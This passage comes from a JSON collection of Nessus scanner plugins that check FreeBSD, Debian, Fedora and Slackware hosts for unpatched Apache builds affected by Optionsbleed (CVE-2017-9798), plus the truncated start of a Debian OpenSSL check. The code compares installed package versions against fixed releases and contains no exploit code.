SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103344);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"FreeBSD : Apache -- HTTP OPTIONS method can leak server memory (76b085e2-9d33-11e7-9260-000c292ee6b8) (Optionsbleed)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Fuzzing Project reports :\n\nApache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. This\naffects the Apache HTTP Server through 2.2.34 and 2.4.x through\n2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request\nwhen attempting to read secret data. This is a use-after-free issue\nand thus secret data is not always sent, and the specific data depends\non many factors including configuration. Exploitation with .htaccess\ncan be blocked with a patch to the ap_limit_section function in\nserver/core.c.\"\n );\n # https://vuxml.freebsd.org/freebsd/76b085e2-9d33-11e7-9260-000c292ee6b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5a9655b5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24<2.4.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache22<2.2.34_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:46", "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of .htaccess files by the Apache HTTP Server could result in memory disclosure.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-21T00:00:00", "type": "nessus", "title": "Debian DSA-3980-1 : apache2 - security update (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3980.NASL", "href": "https://www.tenable.com/plugins/nessus/103364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3980. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103364);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"DSA\", value:\"3980\");\n\n script_name(english:\"Debian DSA-3980-1 : apache2 - security update (Optionsbleed)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3980\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 2.4.10-10+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.25-3+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"apache2\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-bin\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-data\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-dbg\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-dev\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-doc\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-mpm-event\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-mpm-itk\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-mpm-worker\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-suexec\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-suexec-custom\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-suexec-pristine\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2-utils\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2.2-bin\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"apache2.2-common\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-macro\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-proxy-html\", reference:\"2.4.10-10+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-bin\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-data\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-dbg\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-dev\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-doc\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-ssl-dev\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-suexec-custom\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-suexec-pristine\", reference:\"2.4.25-3+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-utils\", reference:\"2.4.25-3+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-01T15:07:13", "description": "This is a release fixing a security fix applied upstream, known as 'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why wouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-01-15T00:00:00", "type": "nessus", "title": "Fedora 27 : httpd (2017-fdd3a98e8f) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-FDD3A98E8F.NASL", "href": "https://www.tenable.com/plugins/nessus/106018", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-fdd3a98e8f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106018);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"FEDORA\", value:\"2017-fdd3a98e8f\");\n\n script_name(english:\"Fedora 27 : httpd (2017-fdd3a98e8f) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a release fixing a security fix applied upstream, known as\n'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why\nwouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-fdd3a98e8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"httpd-2.4.27-8.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:46", "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-19T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : httpd (SSA:2017-261-01) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2017-261-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-261-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103306);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"SSA\", value:\"2017-261-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : httpd (SSA:2017-261-01) (Optionsbleed)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.551634\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bf69bb8a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i586\", pkgnum:\"2_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i586\", pkgnum:\"3\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-07T15:43:12", "description": "A security vulnerability was discovered in OpenSSL, the Secure Sockets Layer toolkit.\n\nCVE-2017-3735\n\nIt was discovered that OpenSSL is prone to a one-byte buffer overread while parsing a malformed IPAddressFamily extension in an X.509 certificate.\n\nDetails can be found in the upstream advisory:\nhttps://www.openssl.org/news/secadv/20170828.txt\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.0.1t-1+deb7u3.\n\nWe recommend that you upgrade your openssl packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2017-11-10T00:00:00", "type": "nessus", "title": "Debian DLA-1157-1 : openssl security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libssl-dev", "p-cpe:/a:debian:debian_linux:libssl-doc", "p-cpe:/a:debian:debian_linux:libssl1.0.0", "p-cpe:/a:debian:debian_linux:libssl1.0.0-dbg", "p-cpe:/a:debian:debian_linux:openssl", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1157.NASL", "href": "https://www.tenable.com/plugins/nessus/104481", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1157-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104481);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-3735\");\n\n script_name(english:\"Debian DLA-1157-1 : openssl security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A security vulnerability was discovered in OpenSSL, the Secure Sockets\nLayer toolkit.\n\nCVE-2017-3735\n\nIt was discovered that OpenSSL is prone to a one-byte buffer overread\nwhile parsing a malformed IPAddressFamily extension in an X.509\ncertificate.\n\nDetails can be found in the upstream advisory:\nhttps://www.openssl.org/news/secadv/20170828.txt\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.0.1t-1+deb7u3.\n\nWe recommend that you upgrade your openssl packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/11/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/openssl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20170828.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssl-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssl1.0.0\");\n 